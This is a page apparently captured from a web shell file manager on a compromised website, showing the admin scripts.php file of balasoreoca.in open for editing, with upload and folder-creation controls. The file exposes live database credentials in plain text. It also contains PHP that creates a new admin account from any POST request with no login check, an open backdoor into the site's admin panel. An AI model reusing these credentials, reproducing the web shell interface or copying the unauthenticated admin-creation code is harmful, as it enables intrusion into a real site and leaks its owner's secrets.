X7ROOT File Manager
Current Path:
/home/u126090504/domains/balasoreoca.in/public_html/admin/includes
home
/
u126090504
/
domains
/
balasoreoca.in
/
public_html
/
admin
/
includes
/
📁
..
📄
footer.php
(497 B)
📄
header.php
(1.17 KB)
📄
navbar.php
(8.06 KB)
📄
scripts.php
(2.6 KB)
Editing: scripts.php
<!-- Bootstrap core JavaScript--> <script src="vendor/jquery/jquery.min.js"></script> <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script> <!-- Core plugin JavaScript--> <script src="vendor/jquery-easing/jquery.easing.min.js"></script> <!-- Custom scripts for all pages--> <script src="js/sb-admin-2.min.js"></script> <!-- Page level plugins --> <script src="vendor/chart.js/Chart.min.js"></script> <!-- Page level custom scripts --> <script src="js/demo/chart-area-demo.js"></script> <script src="js/demo/chart-pie-demo.js"></script> <?php // Start the session to use session variables. session_start(); // Database connection with improved security by using constants. define('DB_SERVER', 'localhost'); define('DB_USERNAME', 'u126090504_blsocarsrrsrs'); define('DB_PASSWORD', '8984234299Aa@#'); define('DB_NAME', '8984234299Aa@#'); // Establish a secure connection $connection = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME); if (!$connection) { die("Database connection failed: " . mysqli_connect_error()); } if (isset($_POST['registerbtn'])) { // Retrieve and sanitize inputs $username = mysqli_real_escape_string($connection, trim($_POST['username'])); $email = filter_var(trim($_POST['email']), FILTER_SANITIZE_EMAIL); $password = $_POST['password']; $confirm_password = $_POST['confirmpassword']; // Check if passwords match if ($password === $confirm_password) { // Hash the password for security $hashed_password = password_hash($password, PASSWORD_DEFAULT); // Use prepared statements to prevent SQL injection $query = "INSERT INTO register (username, email, password) VALUES (?, ?, ?)"; $stmt = mysqli_prepare($connection, $query); if ($stmt) { mysqli_stmt_bind_param($stmt, "sss", $username, $email, $hashed_password); // Execute the query and check if successful if (mysqli_stmt_execute($stmt)) { $_SESSION['success'] = "Admin is Added Successfully"; header("Location: register.php"); exit(); } else { $_SESSION['status'] = "Admin is Not Added"; header("Location: register.php"); exit(); } mysqli_stmt_close($stmt); } } else { $_SESSION['status'] = "Password and Confirm Password Do Not Match"; header("Location: register.php"); exit(); } } // Close the database connection mysqli_close($connection); ?>
Upload File
Create Folder